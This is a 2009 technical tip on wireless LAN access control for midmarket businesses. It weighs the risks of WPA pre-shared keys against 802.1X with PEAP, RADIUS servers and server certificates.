Businesses that deploy wireless access must prevent unauthorized use and asset exposure. Failure to do so could have serious consequences -- no company wants to make Wi-Fi breach headlines like TJX and Heartland did, or deal with costly attack cleanup and recovery.
However, many WLAN administrators at midmarket companies find themselves torn. The simple pre-shared keys (PSKs) designed for homes and small businesses are limiting and risky. On the other hand, strong 802.1X access control requires enterprise-class authentication infrastructure, including RADIUS servers and digital certificates. Fortunately, there are simple-but-safe approaches for security-conscious businesses short on staff and cash.
Understanding PSK Risks
Wireless LANs secured with WPA-Personal or WPA2-Personal PSKs are more difficult to penetrate than those using old broken WEP or easily-spoofed MAC Access Control Lists (ACLs). It is still important to avoid short PSKs composed of dictionary words, especially with common SSIDs. But random PSKs that exceed 20 characters, combined with unique SSIDs, can deter rapid cracking by tools such as CoWPAtty and
Unfortunately, even good PSKs share human-induced vulnerabilities that plague any group password. Everyone using your WLAN logs in using the same PSK -- if an employee loses a laptop, gets fired, or gives your PSK to a guest, all bets are off. Depending upon the size and savvy of your workforce, updating your WLAN's PSK can be an operational and security nightmare.
Businesses should thus exercise caution when relying upon PSKs for WLAN access control. For example, long random PSKs might be a reasonable choice for embedded systems such as point-of-sale devices and printers -- so long as they are physically secured to prevent theft. Temporary PSKs, issued daily, may also be a workable solution for guest Internet access in cases where the goal is simply to discourage unauthorized use.
Reaping 802.1X Benefits
Where PSKs just won't do, there are two alternatives: 802.1X port access control or captive portal authentication. Captive portals are used in hospitality and education WLANs that need only to restrict access, but 802.1X is more appropriate for business WLANs that also require over-the-air data privacy.
802.1X is supported by all Wi-Fi products that have passed WPA-Enterprise or WPA2-Enterprise certification. This not only includes business-grade access points (APs), but nearly every home AP and laptop Wi-Fi adapter. Today, the only devices that cannot support 802.1X tend to be "headless" consumer electronics and small purpose-built devices such as Wi-Fi barcode scanners and VoIP handsets.
Broad support also means that one big 802.1X deployment challenge has dissipated. Specifically, it is no longer necessary to install client software on every wireless device; 802.1X supplicants are now included in contemporary operating systems. After-market 802.1X supplicants can still be installed to meet advanced needs like Network Access Control (NAC) integration. However, password-based log-in can usually be accomplished by native 802.1X supplicants using Protected EAP (PEAP) / MS-CHAPv2.
When using 802.1X with PEAP, every individual logs into the WLAN with their own password. This eliminates group password and PSK-cracking risks and provides more granular control over (and visibility into) WLAN usage. Not only does it become possible to track each user's access and satisfy audit requests, but 802.1X provides a mechanism to control permissions. Users can be given wireless access to different resources based upon their authenticated identity -- for example, mapping contractors, engineers, and accountants onto different virtual LANs or subnets.
Under the Hood
802.1X client installation may no longer be required, but the WLAN itself still needs 802.1X server infrastructure. Specifically, access control decisions will be moved from individual wireless APs to a central authentication server, reached via RADIUS. That authentication server becomes responsible for permitting or denying access, based upon the user's identity and credentials.
802.1X can be used to support many kinds of wireless authentication, but most (including PEAP / MS-CHAPv2) tunnel the log-in dialog between the user and server over TLS. This secure tunnel stops wireless hackers from capturing passwords, but it also requires the server have a digital certificate.
Issuing a single certificate to an authentication server is not costly or onerous. Self-signed certificates can be generated by open source tools such as OpenSSL, but purchasing a certificate signed by a trusted root authority such as VeriSign is safer and ultimately easier. Users will be able to verify the server's identity to avoid Evil Twin attacks, without the hassle of distributing self-signed server certificates to every client.
But what about the authentication server? This is the hurdle that stops many WLAN administrators from using 802.1X. Enterprises have the budget and staff to establish RADIUS infrastructure -- in fact, many already have RADIUS servers for remote access VPN authentication. 802.1X was intentionally designed to let enterprises leverage those pre-existing RADIUS investments, including policies and user credentials.
Read part two of this technical tip, which covers the server infrastructure required to support wireless authentication.
Lisa Phifer is vice president of Core Competence Inc. She has been involved in the design, implementation and evaluation of networking, security and management products for more than 25 years, and has advised companies large and small regarding security needs, product assessment, and the use of emerging technologies and best practices.
Send comments on this technical tip to firstname.lastname@example.org.
This was first published in March 2009